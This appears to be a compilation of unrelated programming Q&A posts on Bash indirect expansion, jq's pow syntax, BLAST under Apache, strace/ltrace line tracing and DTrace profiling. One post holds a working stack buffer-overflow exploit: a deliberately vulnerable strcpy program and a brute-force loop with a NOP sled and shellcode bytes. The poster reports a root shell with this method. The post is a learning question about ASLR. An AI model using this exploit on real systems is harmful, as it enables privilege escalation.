I'm really struggling to get some dynamically assigned variables working, even though I've been through the rather wonderfully informative SO article that I've been staring at for a couple of hours now. I just can't seem to get anything to work. I'm using Bash 4.4.20 on Ubuntu 18.04.5.
I have a function that sets up some variables, much like:
declare -g AthreadCount
AthreadCount=$(ps -ef | grep svcA) # 2
declare -g BthreadCount
BthreadCount=$(ps -ef | grep svcB) # 4
declare -g CthreadCount
CthreadCount=$(ps -ef | grep svcC) # 1
In another function, I have the array set up of those services:
declare -a -g services=(A B C)
(To be fair, I'm parsing a jq result to build the array, but it is populated and globally available in other functions, so I'm comfortable it's working as expected.)
In another function, I want to evaluate each variable's value, and I can't get what I understand to be called "pointer" assignments (indirect expansion) working. I believe my code should look like this:
for sts in "${services[@]}"; do
echo ${sts}
svc="${sts}threadCount"
echo ${!svc}
done
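(Put together as a self-contained sketch, with the counts hard-coded instead of coming from ps, the whole thing I'm trying to do looks like this:)
#!/usr/bin/env bash
declare -g AthreadCount=2
declare -g BthreadCount=4
declare -g CthreadCount=1
declare -a -g services=(A B C)
for sts in "${services[@]}"; do
    echo "${sts}"
    svc="${sts}threadCount"   # build the variable name, e.g. AthreadCount
    echo "${!svc}"            # indirect expansion: print that variable's value
done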
And I would expect:
A
2
B
4
C
1
but I end up getting
A
B
C
Obviously it's not working, and I've gone through everything I can think of to get it working.
Thoughts / comments?!
According to the manual, all the standard math library functions should be available to me in jq. But not even the simple ones are available.
How do I add the math libraries on Ubuntu or include them when I run jq?
jq -n 'pow(2,4)'
returns
jq: error: pow/1 is not defined at <top-level>, line 1:
pow(2,4)
jq: 1 compile error
The error message gives it away:
pow/1 is not defined […]
Huh, but you are calling it with two arguments – why does it try to call the unary function? Because you are not: jq uses semicolons to separate function arguments; commas separate the elements of a stream.
jq -n 'pow(2;4)'
This will call pow/2 which you are after.
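Running that returns the expected value:
$ jq -n 'pow(2;4)'
16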
Then where do commas come into play? Consider:
$ jq -n 'pow(2,3;4,5)'
16 # 2**4 or pow(2;4)
81 # 3**4 or pow(3;4)
32 # 2**5 or pow(2;5)
243 # 3**5 or pow(3;5)
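The same comma-as-stream behaviour combines naturally with a pipe, if that form reads better:
$ jq -n '2,3 | pow(.;4)'
16
81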
I just read about Address Space Layout Randomization and I tried a very simple script to try to brute force it. Here is the program I used to test a few things.
#include <stdio.h>
#include <string.h>
int main (int argc, char **argv)
{
char buf[8];
printf("&buf = %p\n", buf);
if (argc > 1 && strcpy(buf, argv[1]));
return 0;
}
I compiled it with this command:
gcc -g -fno-stack-protector -o vul vul.c
I made sure ASLR was enabled:
$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
Then, I came up with this simple script:
str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
. "\x90"x65536 \
. "\x31\xc0\x40\x89\xc3\xcd\x80"'`
while [ $? -ne 1 ]; do
./vul $str
done
The format is
return address ×10 (40 bytes) | 64 KB NOP slide | 7-byte shellcode that runs exit(1)
After running this script for a few seconds it exits with error code 1 as I wanted it to. I also tried other shellcodes that call execv("/bin/sh", ...) and I was successful as well.
I find it strange that it's possible to create such a long NOP slide even after the return address. I thought ASLR was more effective than that; did I miss something? Is it because the address space is too small?
EDIT: I did some additional research and here is what I found:
I asked a friend to run this code using -m32 -z execstack on his 64-bit computer and, after changing the return address a bit, he had the same results.
Even though I did not use -z execstack, I managed to execute the shellcode. I made sure of that by using different shellcodes which all did what they were supposed to do (even the well-known scenario: chown root ./vul, chmod +s ./vul, a shellcode that runs setreuid(0, 0) then execv("/bin/sh", ...), and finally whoami returning 'root' in the spawned shell).
That is quite strange, since execstack -q ./vul tells me the executable-stack flag bit is not set. Does anyone have an idea why?
First of all, I'm a bit surprised that you do not need to pass the option -z execstack to the compiler to get the shellcode to execute the exit(1).
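(A quick way to check how the binary was actually flagged, assuming the vul executable built above, is to look at its GNU_STACK program header:)
readelf -lW ./vul | grep GNU_STACK
# flags "RWE" on that line mean the stack is mapped executable; "RW " means it is not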
Moreover, I guess you are on a 32-bit machine, as you did not pass the option -m32 to gcc to get 32-bit code.
Finally, I did run your program without success (I waited way more than a few seconds).
So I'm a bit doubtful about your conclusion (unless you are running a very peculiar Linux system, or simply got lucky).
Anyway, there are two main things that you have not mentioned:
Having a bug that offers an unlimited exploitation window (you can try as many times as you like) is quite rare.
Most modern systems run on amd64 (64-bit) processors, which drastically lowers the probability of hitting the NOP zone.
You may take a look at the section "ASLR Effectiveness" on the ASLR's Wikipedia page.
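As a rough way to see how much stack randomization you are actually fighting, you can run the vul binary from the question (which prints &buf) many times and count the distinct addresses; a quick sketch:
for i in $(seq 1000); do ./vul; done | sort -u | wc -l
# the closer this count is to 1000, the more entropy there is to brute-force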
I am running a local BLAST program on an Apache2 server, but it is showing me this error:
--------------------- WARNING ---------------------
MSG: cannot find path to blastall
My code is:
#!/usr/bin/perl
print "Content-type: text/html\n\n";
use Bio::Perl;
use Bio::Tools::Run::StandAloneBlast;
@params = ('database' => 'btaudb', 'outfile' => 'bla.out',
           '_READMETHOD' => 'Blast', 'prog' => 'blastn');
$factory = Bio::Tools::Run::StandAloneBlast->new(@params);
$str = Bio::SeqIO->new(-file=>'test_query.fa' , '-format' => 'Fasta' );
$input = $str->next_seq();
$factory->blastall($input);
When I run the same code in the terminal it works fine and shows the correct result. Please help me: how do I run a local BLAST program under the Apache2 server?
In my experience, that message means that you do not have the blastall tool available in your PATH. That is, if you typed "blastall -p blastn -d dbname -i input -o output" at your command line, as was the normal usage, your shell would complain about not being able to find blastall.
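A quick sanity check is to compare the PATH your shell uses with the one the web server sees (the exact Apache environment varies, so treat this as a sketch):
which blastall     # finds it in your login shell, where your profile sets the PATH
echo "$PATH"       # Apache/CGI typically runs with a much shorter PATH, so blastall is often not on it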
The Blastall interface appears to be on its way out, as noted here: http://www.ncbi.nlm.nih.gov/books/NBK1763/#CmdLineAppsManual.I43_Backwards_compatib. Newer versions of BLAST have only this wrapper script installed, and expect you to use the BLAST+ interface going forward.
I have found success using Bio::Tools::Run::StandAloneBlastPlus. The interface is very similar, and if your codebase is not very extensive yet, it should be relatively straightforward to begin using.
Is it possible to view the line number and file name (for my program running under ltrace/strace) along with the library call/system call information?
Eg:
code section :: ptr = malloc(sizeof(int)*5); (file:code.c, line:21)
ltrace or any other tool: malloc(20) :: code.c::21
I have tried all the options of ltrace/strace but cannot figure out a way to get this info.
If not possible through ltrace/strace, do we have any parallel tool option for GNU/Linux?
You may be able to use the -i option (to output the instruction pointer at the time of the call) in strace and ltrace, combined with addr2line to resolve the calls to lines of code.
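A rough sketch of that combination (myprog and the address are placeholders):
ltrace -i ./myprog 2> calls.txt       # each library call is prefixed with the caller's instruction pointer
strace -i ./myprog 2> syscalls.txt    # same idea for system calls
addr2line -e ./myprog 0x4005f2        # map one recorded address back to file:line (build with -g)
# for position-independent executables you may need to subtract the load base from the address first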
No, it's not possible. Why don't you use gdb for this purpose?
When compiling the application with gcc, use the -ggdb flag to get debugging info into your program, and then run it under gdb or an equivalent frontend (ddd or similar).
Here is a quick gdb tutorial to help you out a bit:
http://www.cs.cmu.edu/~gilpin/tutorial/
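For example, a rough session (myprog/myprog.c are placeholder names) that stops on every malloc call and shows which source line made it:
gcc -ggdb -o myprog myprog.c
gdb ./myprog
(gdb) break malloc
(gdb) run
(gdb) backtrace      # the caller's frame shows the file and line that invoked malloc
(gdb) continue       # run on to the next malloc call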
You can use strace-plus, which can collect stack traces associated with each system call.
http://code.google.com/p/strace-plus/
Pretty old question, but I found a way to accomplish what OP wanted:
First, use strace with the -k option, which will generate a stack trace like this:
openat(AT_FDCWD, NULL, O_RDONLY) = -1 EFAULT (Bad address)
> /usr/lib/libc-2.33.so(__open64+0x5b) [0xefeab]
> /usr/lib/libc-2.33.so(_IO_file_open+0x26) [0x816f6]
> /usr/lib/libc-2.33.so(_IO_file_fopen+0x10a) [0x818ca]
> /usr/lib/libc-2.33.so(__fopen_internal+0x7d) [0x7527d]
> /mnt/r/build/tests/main(main+0x90) [0x1330]
> /usr/lib/libc-2.33.so(__libc_start_main+0xd5) [0x27b25]
> /mnt/r/build/tests/main(_start+0x2e) [0x114e]
The address of each function call is displayed at the end of each line, and you can pass it to addr2line to retrieve the file and line. For example, say we want to locate the call in main() (fifth line of the stack trace):
addr2line -e tests/main 0x1330
It will show something like this:
/mnt/r/main.c:55
I was searching online for something to help me do assembly line profiling, and I found the following on http://www.webservertalk.com/message897404.html
There are two parts to this problem: finding all instructions of a particular type (inc, add, shl, etc.) to determine groupings, and then figuring out which are getting executed and summing correctly. The first bit is tricky unless grouping by disassembler is sufficient. For figuring out which instructions are being executed, DTrace is of course your friend here (at least in userland).
The nicest way of doing this would be to instrument only the beginning of each basic block; finding these would be a manual process right now. However, instrumenting each instruction is feasible for small applications. Here's an example:
First, our quite trivial C program under test:
#include <unistd.h>

int main(void)
{
    int i;
    for (i = 0; i < 100; i++)
        getpid();
    return 0;
}
Now, our slightly tricky D script:
#pragma D option quiet
pid$target:a.out::entry
/address[probefunc] == 0/
{
address[probefunc]=uregs[R_PC];
}
pid$target:a.out::
/address[probefunc] != 0/
{
@a[probefunc,(uregs[R_PC]-address[probefunc]), uregs[R_PC]]=count();
}
END
{
printa("%s+%#x:\t%d\t%@d\n", @a);
}
Running this against the test program gives output like:
main+0x1: 1
main+0x3: 1
main+0x6: 1
main+0x9: 1
main+0xe: 1
main+0x11: 1
main+0x14: 1
main+0x17: 1
main+0x1a: 1
main+0x1c: 1
main+0x23: 101
main+0x27: 101
main+0x29: 100
main+0x2e: 100
main+0x31: 100
main+0x33: 100
main+0x35: 1
main+0x36: 1
main+0x37: 1
From the example given, this is exactly what I need. However, I have no idea what it is doing, how to save the DTrace program, or how to execute it against the code I want results for. So I opened this question hoping some people with a good DTrace background could help me understand the code, save it, run it, and hopefully get the results shown.
If all you want to do is run this particular DTrace script, simply save it to a .d script file and use a command like the following to run it against your compiled executable:
sudo dtrace -s dtracescript.d -c [Path to executable]
where you replace dtracescript.d with your script file name.
This assumes that you have DTrace as part of your system (I'm running Mac OS X, which has had it since Leopard).
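Concretely, for the toy loop program from the question, the whole run might look like this (test.c and count.d are just example file names):
gcc -o a.out test.c                  # the trivial for-loop program under test
sudo dtrace -s count.d -c ./a.out    # -c launches the program; $target in the script becomes its pid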
If you're curious about how this works, I wrote a two-part tutorial on using DTrace for MacResearch a while ago, which can be found here and here.